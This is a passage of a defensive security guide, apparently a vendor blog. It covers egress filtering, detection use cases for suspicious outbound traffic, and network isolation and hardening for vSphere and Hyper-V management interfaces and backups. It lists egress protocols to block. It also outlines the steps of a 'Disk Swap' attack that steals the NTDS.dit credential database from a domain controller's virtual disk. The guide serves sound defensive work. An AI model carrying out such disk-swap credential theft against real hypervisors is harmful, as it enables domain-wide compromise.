effectively reduce the risk of a threat actor compromising servers, extracting data, or installing backdoors that leverage egress communications for maintaining access.</span></p> <p><span style="vertical-align: baseline;">Egress restrictions should be enforced so that servers, internal network devices, critical IT assets, OT assets, and field devices cannot attempt to communicate to external sites and addresses (internet resources). The concept of deny by default should apply to all servers, network devices, and critical assets (including both IT and OT), with only allow-listed and authorized egress traffic flows explicitly defined and enforced. Where possible, this should include blocking recursive Domain Name System (DNS) resolutions not included in an allow-list to prevent communication via DNS tunneling.</span></p> <p><span style="vertical-align: baseline;">If possible, egress traffic should be routed through an inspection layer (such as a proxy) to monitor external connections and block any connections to malicious domains or IP addresses. Connections to uncategorized network locations (e.g., a domain that has been recently registered) should not be permitted. Ideally, DNS requests would be routed through an external service (e.g., Cisco Umbrella, Infoblox DDI) to monitor for lookups to malicious domains. </span></p> <p><span style="vertical-align: baseline;">Threat actors often attempt to harvest credentials (including New Technology Local Area Network [LAN] Manager [NTLM] hashes) based upon outbound Server Message Block (SMB) or Web-based Distributed Authoring and Versioning (WebDAV) communications. Organizations should review and limit the scope of egress protocols that are permissible from </span><strong style="vertical-align: baseline;">any</strong><span style="vertical-align: baseline;"> endpoint within the environment. While Hypertext Transfer Protocol (HTTP) (Transmission Control Protocol (TCP)/80) and HTTP Secure (HTTPS) (TCP/443) egress communications are likely required for many user-based endpoints, the scope of external sites and addresses can potentially be limited based upon web traffic-filtering technologies. Ideally, organizations should only permit egress protocols and communications based upon a predefined allow-list. Common high-risk ports for egress restrictions include:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">File Transfer Protocol (FTP)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Remote Desktop Protocol (RDP)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Secure Shell (SSH)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Server Message Block (SMB)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Trivial File Transfer Protocol (TFTP) </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">WebDAV</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Detection Opportunities for Suspicious Egress Traffic Flows</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">External Connection Attempt to a Known Malicious IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/tactics/TA0011/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">TA0011 – Command and Control</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Leverage threat feeds to identify attempted connections to known bad IP addresses.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">External Communications from Servers, Critical Assets, and Isolated Network Segments</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/tactics/TA0011/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">TA0011 – Command and Control</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for egress traffic flows from subnets and addresses that correlate to servers, critical assets, OT segments, and field devices.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound Connections Attempted Over SMB</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1212/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1212 – Exploitation for Credential Access</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for external connection attempts over SMB, as this may be an attempt to harvest credential hashes.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 6: Detection opportunities for suspicious egress traffic flows</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Virtualization Infrastructure Protections</span><strong style="vertical-align: baseline;"> </strong></h4> <p><span style="vertical-align: baseline;">Threat actors often target virtualization infrastructure (e.g., VMware vSphere, Microsoft Hyper-V) as part of their reconnaissance, lateral movement, data theft, and potential ransomware deployment objectives. Securing virtualization infrastructure requires a Zero Trust network posture as a primary defense. Because management appliances often lack native MFA for local privileged accounts, identity-based security alone can be a high-risk single point of failure. If credentials are compromised, the logical network architecture becomes the final line of defense protecting the virtualization management plane.</span></p> <p><span style="vertical-align: baseline;">To reduce the attack surface of virtualized infrastructure, a best practice for VMware vSphere vCenter ESXi and Hyper-V appliances and servers is to isolate and restrict access to the management interfaces, essentially enclaving these interfaces within isolated virtual local area networks (VLANs) (network segments) where connectivity is only permissible from dedicated subnets where administrative actions can be initiated.</span></p> <p><span style="vertical-align: baseline;">To protect the virtualization control plane, organizations must consider a "defense-in-depth" network model. This architecture integrates physical isolation and east-west micro-segmentation to remove all access paths from untrusted networks. The result is a management zone that remains isolated and resilient, even during an active intrusion.</span></p> <h5><span style="vertical-align: baseline;">VMware vSphere Zero-Trust Network Architecture</span><span style="vertical-align: baseline;"> </span></h5> <p><span style="vertical-align: baseline;">The primary goal is to ensure that even if privileged credentials are compromised, the logical network remains the definitive defensive layer preventing access to virtualization management interfaces.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Immutable VLAN Segmentation</strong><span style="vertical-align: baseline;">: Enforce strict isolation using distinct 802.1Q VLAN IDs for host management, Infrastructure/VCSA, vMotion (non-routable), Storage (non-routable), and production Guest VMs.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Virtual Routing and Forwarding (VRF)</strong><span style="vertical-align: baseline;">: Transition all infrastructure VLANs into a dedicated VRF instance. This ensures that even a total compromise of the "User" or "Guest" zones results in no available route to the management zone(s).</span></p> </li> </ul> <h6><span style="vertical-align: baseline;">Layer 3 and 4 Access Policies</span></h6> <p><span style="vertical-align: baseline;">The management network must be accessible only from trusted, hardened sources.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">PAW-Exclusive Access:</strong><span style="vertical-align: baseline;"> Deconstruct all direct routes from the general corporate LAN to management subnets. Access must originate strictly from a designated Privileged Access Workstation (PAW) subnet.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Ingress Filtering (Management Zone)</strong><span style="vertical-align: baseline;">:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">ALLOW:</strong><span style="vertical-align: baseline;"> TCP/443 (UI/API) and TCP/902 (MKS) from the PAW subnet only.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">DENY</strong><span style="vertical-align: baseline;">: Explicitly block SSH (TCP/22) and VAMI (TCP/5480) from all sources </span><span style="font-style: italic; vertical-align: baseline;">except</span><span style="vertical-align: baseline;"> the PAW subnet.</span></p> </li> </ul> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Restrictive Egress Policy:</strong><span style="vertical-align: baseline;"> Enforce outbound filtering at the hardware gateway (as the VCSA GUI cannot manage egress). To prevent persistence using C2 traffic and data exfiltration, block all internet access except to specific, verified update servers (e.g., VMware Update Manager) and authorized identity providers.</span></p> </li> </ul> <h6><span style="vertical-align: baseline;">Host-Based Firewall Enforcement</span></h6> <p><span style="vertical-align: baseline;">Complement network firewalls with host-level filtering to eliminate visibility gaps within the same VLAN.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">VCSA (Photon OS)</strong><span style="vertical-align: baseline;">: Transition the default policy to "Default Deny" via the VAMI or, preferably, at the OS level using iptables/nftables for granular source/destination mapping. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">ESXi Hypervisors: </strong><span style="vertical-align: baseline;">Restrict all services (SSH, Web Access, NFC/Storage) to specific management IPs by deselecting "Allow connections from any IP address."</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Additional information related to <a href="https://knowledge.broadcom.com/external/article/377036/how-to-block-all-traffic-on-vcenter-exce.htm" rel="noopener" target="_blank">VMware vSphere VCSA host based firewalls</a>.</span></p> <p><span style="vertical-align: baseline;">A <a href="https://kb.vmware.com/s/article/1012382" rel="noopener" target="_blank">listing of administrative ports</a> associated with VMWare vCenter (that should be targeted for isolation).</span></p> <h5><span style="vertical-align: baseline;">Hyper-V Zero-Trust Network Architecture </span></h5> <p><span style="vertical-align: baseline;">Similar to vSphere, Hyper-V requires strict isolation of its various traffic types to prevent lateral movement from guest workloads to the management plane.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">VLAN Segmentation:</strong><span style="vertical-align: baseline;"> Organizations must enforce isolation using distinct VLANs for Host Management, Live Migration, Cluster Heartbeat (CSV), and Production Guest VMs.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Non-Routable Networks:</strong><span style="vertical-align: baseline;"> Traffic for Live Migration and Cluster Shared Volumes (CSV) should be placed on non-routable VLANs to ensure these high-bandwidth, sensitive streams cannot be intercepted from other segments.</span></p> </li> </ul> <h6><span style="vertical-align: baseline;">Layer 3 and 4 Access Policies</span></h6> <p><span style="vertical-align: baseline;">The management network must be accessible only from trusted, hardened sources.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">PAW-Exclusive Access:</strong><span style="vertical-align: baseline;"> Deconstruct all direct routes from the general corporate LAN to management subnets. Access must originate strictly from a designated Privileged Access Workstation (PAW) subnet.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Ingress Filtering (Management Zone)</strong><span style="vertical-align: baseline;">:</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">ALLOW</strong><span style="vertical-align: baseline;">: WinRM / PowerShell Remoting (TCP/5985 and TCP/5986), RDP (TCP/3389), and WMI/RPC (TCP/135 and dynamic RPC ports)strictly from the PAW subnet. If using Windows Admin Center, allow HTTPS (TCP/443) to the gateway.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">DENY</strong><span style="vertical-align: baseline;">: Explicitly block SMB (TCP/445), RPC/WMI (TCP/135), and all other management traffic from untrusted sources to prevent credential theft and lateral movement.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Restrictive Egress Policy: </strong><span style="vertical-align: baseline;">Enforce outbound filtering at the network gateway. To prevent persistence using C2 traffic and data exfiltration, block all internet access from Hyper-V hosts except to specific, verified update servers (e.g., internal WSUS), authorized Active Directory Domain Controllers, and Key Management Servers (KMS).</span></p> </li> </ul> <h6><span style="vertical-align: baseline;">Host-Based Firewall Enforcement</span></h6> <p><span style="vertical-align: baseline;">Use the Windows Firewall with Advanced Security (WFAS) to achieve a defense-in-depth posture at the host level.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Scope Restriction: </strong><span style="vertical-align: baseline;">For all enabled management rules (e.g., File and Printer Sharing, WMI, PowerShell Remoting), modify the Remote IP Address scope to "These IP addresses" and enter only the PAW and management server subnets.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Management Logging: </strong><span style="vertical-align: baseline;">Enable logging for Dropped Packets in the Windows Firewall profile. This allows the SIEM to ingest "denied" connection attempts, which serve as high-fidelity indicators of internal reconnaissance or unauthorized access attempts.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Additional information related to <a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj721516(v=ws.11)" rel="noopener" target="_blank">Hyper-V host based firewalls</a>.</span></p> <p><span style="vertical-align: baseline;">Additional information related to <a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/plan/plan-hyper-v-security-in-windows-server" rel="noopener" target="_blank">securing Hyper-V</a>.</span><span style="vertical-align: baseline;"> </span></p> <h5><span style="vertical-align: baseline;">General Virtualization Hardening </span></h5> <p><span style="vertical-align: baseline;">To protect management interfaces for VMware vSphere the VMKernel network interface card (NIC) should </span><strong style="vertical-align: baseline;">not</strong><span style="vertical-align: baseline;"> be bound to the same virtual network assigned to virtual machines running on the host. Additionally, ESXi servers can be configured in lockdown mode, which will only allow console access from the vCenter server(s). Additional information related to <a href="https://kb.vmware.com/s/article/1008077" rel="noopener" target="_blank">lockdown mode</a></span><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">The SSH protocol (TCP/22) provides a common channel for accessing a physical virtualization server or appliance (vCenter) for administration and troubleshooting. Threat actors commonly leverage SSH for direct access to virtualization infrastructure to conduct destructive attacks. In addition to enclaving access to administrative interfaces, SSH access to virtualization infrastructure should be disabled and only enabled for specific use-cases. If SSH is required, network ACLs should be used to limit where connections can originate.</span></p> <p><span style="vertical-align: baseline;">Identity segmentation should also be configured when accessing administrative interfaces associated with virtualization infrastructure. If Active Directory authentication provides direct integrated access to the physical virtualization stack, a threat actor that has compromised a valid Active Directory account (with permissions to manage the virtualization infrastructure) could potentially use the account to directly access virtualized systems to steal data or perform destructive actions.</span></p> <p><span style="vertical-align: baseline;">Authentication to virtualized infrastructure should rely upon dedicated and unique accounts that are configured with strong passwords and that are </span><strong style="vertical-align: baseline;">not</strong><span style="vertical-align: baseline;"> co-used for additional access within an environment. Additionally, accessing management interfaces associated with virtualization infrastructure should only be initiated from isolated privileged access workstations, which prevent the storing and caching of passwords used for accessing critical infrastructure components.</span></p> <h5><span style="vertical-align: baseline;">Protecting Hypervisors Against Offline Credential Theft and Exfiltration</span></h5> <p><span style="vertical-align: baseline;">Organizations should implement a proactive, defense-in-depth technical hardening strategy to systematically address security gaps and mitigate the risk of offline credential theft from the hypervisor layer. The core of this attack is an offline credential theft technique known as a "Disk Swap." Once an adversary has administrative control over the hypervisor (vSphere or Hyper-V), they perform the following steps:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Target Identification:</strong><span style="vertical-align: baseline;"> The actor identifies a critical virtualized asset, such as a Domain Controller (DC) </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Offline Manipulation:</strong><span style="vertical-align: baseline;"> The target VM is powered off, and its virtual disk file (e.g., .vmdk for VMware or .vhd/.vhdx for Hyper-V) is detached.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">NTDS.dit Extraction</strong><span style="vertical-align: baseline;">: The disk is attached to a staging or "orphaned" VM under the attacker's control. From this unmonitored machine, they copy the NTDS.dit Active Directory database.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Stealthy Recovery</strong><span style="vertical-align: baseline;">: The disk is re-attached to the original DC, and the VM is powered back on, leaving minimal forensic evidence within the guest operating system.</span></p> </li> </ul> <h6><span style="vertical-align: baseline;">Hardening and Mitigation Guidance</span></h6> <p><span style="vertical-align: baseline;">To defend against this logic, organizations must implement a defense-in-depth strategy that focuses on cryptographic isolation and strict lifecycle management.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Virtual Machine Encryption</strong><span style="vertical-align: baseline;">: Organizations must encrypt all Tier 0 virtualized assets (e.g., Domain Controllers, PKI, and Backup Servers). Encryption ensures that even if a virtual disk file is stolen or detached, it remains unreadable without access to the specific keys. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Strict Decommissioning Processes</strong><span style="vertical-align: baseline;">: Do not leave powered-off or "orphaned" virtual machines on datastores. These "ghost" VMs are ideal staging environments for attackers. Formally decommission assets by deleting their virtual disks rather than just removing them from the inventory.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Harden Hypervisor Accounts</strong><span style="vertical-align: baseline;">: Disable or restrict default administrative accounts (such as root on ESXi or the local Administrator on Hyper-V hosts). Enforce </span><a href="https://knowledge.broadcom.com/external/article/336894/enabling-or-disabling-lockdown-mode-on-a.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Lockdown Mode</span></a><span style="vertical-align: baseline;"> (VMware ESXi feature) where possible to prevent direct host-level changes outside of the central management plane.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Remote Audit Logging</strong><span style="vertical-align: baseline;">: Enable and forward all hypervisor-level audit logs (e.g., hostd.log, vpxa.log, or Windows Event Logs for Hyper-V) to a centralized SIEM. </span></p> </li> </ul> <h5><span style="vertical-align: baseline;">Protecting Backups</span></h5> <p><span style="vertical-align: baseline;">Security measures must encompass both production and backup environments. An attack on the production plane is often coupled with a simultaneous focus on backup integrity, creating a total loss of operational continuity. Virtual disk files (VMDK for VMware and VHD/VHDX for Hyper-V) represent a high-value target for offline data theft and direct manipulation.</span></p> <h6><span style="vertical-align: baseline;">Hardening and Mitigation Guidance</span></h6> <p><span style="vertical-align: baseline;">To mitigate the risk of offline theft and backup manipulation, organizations must implement a "Default Encrypted" policy across the entire lifecycle of the virtual disk .</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">At-Rest Encryption for all Tier-0 Assets:</strong><span style="vertical-align: baseline;"> Implement vSphere VM Encryption or Hyper-V Shielded VMs for all critical infrastructure (e.g., Domain Controllers, Certificate Authorities). This ensures that the raw VMDK or VHDX files are cryptographically protected, rendering them unreadable if detached or mounted by an unauthorized party.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Encrypted Backup Repositories</strong><span style="vertical-align: baseline;">: Ensure that the backup application is configured to encrypt backup data at rest using a unique key stored in a separate, hardened Key Management System (KMS). This prevents "direct manipulation" of the backup files even if the backup storage itself is compromised. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Network Isolation of Storage &amp; Backups: </strong><span style="vertical-align: baseline;">Isolate the storage management network and the backup infrastructure into dedicated, non-routable VLANs. Access to the backup console and repositories must require phishing-resistant MFA and originate from a designated Privileged Access Workstation (PAW).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Immutability and Air-Gapping</strong><span style="vertical-align: baseline;">: Use Immutable Backup Repositories to ensure that once a backup is written, it cannot be modified or deleted by any user including a compromised administrator for a set period. This provides a definitive recovery point in the event of a ransomware attack or intentional data sabotage.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Detection Opportunities for Monitoring Virtualization Infrastructure</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 